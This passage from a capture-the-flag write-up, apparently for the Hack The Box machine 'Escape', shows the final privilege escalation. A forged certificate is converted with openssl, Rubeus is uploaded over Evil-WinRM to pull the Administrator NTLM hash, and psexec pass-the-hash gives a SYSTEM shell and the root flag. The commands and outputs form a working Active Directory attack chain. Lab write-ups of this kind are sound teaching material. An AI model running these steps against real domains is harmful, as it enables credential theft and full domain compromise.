IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEAO2M+0veM4HuTInTiOV1AKfiRuLcmMgSIksOJwjVh0ZiQoX+QNbmXUQK/
ZKVSOep0Jnc9E9Jg5ZkPLdZYl/VucpwSV2q85SWC3wCoPj/6weyubB/oGtMRJVmX
U6+ljcTX+GqF9tBO86cH8Q90iXiIJ2CMDhjKcpE0UFLV8oouXikEeMFccmAFIvBB
yP2mai+gCvNWu5rI+iqR9P87tEP4Epy2o/C0n7aluV/OtUGGsXOtUpbU2oTcXGs3
km+UDfnu+/shG97KAUuZnKdO8T27xL2vygg+g+++LBI/Sq+qPWn4oyNMHaroW+dm
/fIS2Mc1yZV7EgTuA4mJROMWMXSkbg==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:14.4161022

Uploading Rubeus to the domain controller.

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\programdata> upload Rubeus.exe
Info: Uploading Rubeus.exe to C:\programdata\Rubeus.exe

                                                             
Data: 609620 bytes of 609620 bytes copied

Info: Upload successful!

Uploading the certificate to the domain controller after its been converted into the correct format.

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\programdata> upload cert.pfx
Info: Uploading cert.pfx to C:\programdata\cert.pfx

                                                             
Data: 4376 bytes of 4376 bytes copied

Info: Upload successful!

Rubeus was able to use the certificate and expose the NTLM hash of the administrator user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
*Evil-WinRM* PS C:\programdata> .\Rubeus.exe asktgt /user:Administrator /certificate:C:\programdata\cert.pfx /getcredentials /show /nowrap

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::b5f7:99af:c8de:95da%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  7/14/2023 11:03:27 PM
  EndTime                  :  7/15/2023 9:03:27 AM
  RenewTill                :  7/21/2023 11:03:27 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  OP77zqcJBXBBFKZ3MNeozQ==
  ASREP (key)              :  8DA32F3799EA637A3DDA855D489BF4FD

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4CC

Logging in with psexec was possible using the NTLM hash. Administrator access achieved and the root user flag was captured.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌─[✗]─[parrot@parrotos]─[~/htb/escape]
└──╼ $psexec.py -hashes A52F78E4C751E5F5E17E1E9F3E58F4CC:A52F78E4C751E5F5E17E1E9F3E58F4CC administrator@sequel.htb
Impacket v0.10.1.dev1+20230712.145931.275f4b97 - Copyright 2022 Fortra

[*] Requesting shares on sequel.htb.....
[*] Found writable share ADMIN$
[*] Uploading file RmPnDgna.exe
[*] Opening SVCManager on sequel.htb.....
[*] Creating service DhNt on sequel.htb.....
[*] Starting service DhNt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type c:\users\administrator\desktop\root.txt 
4a5f8e160e977486e699fdc363be1a2f

C:\Windows\system32> 
This post is licensed under CC BY 4.0 by the author.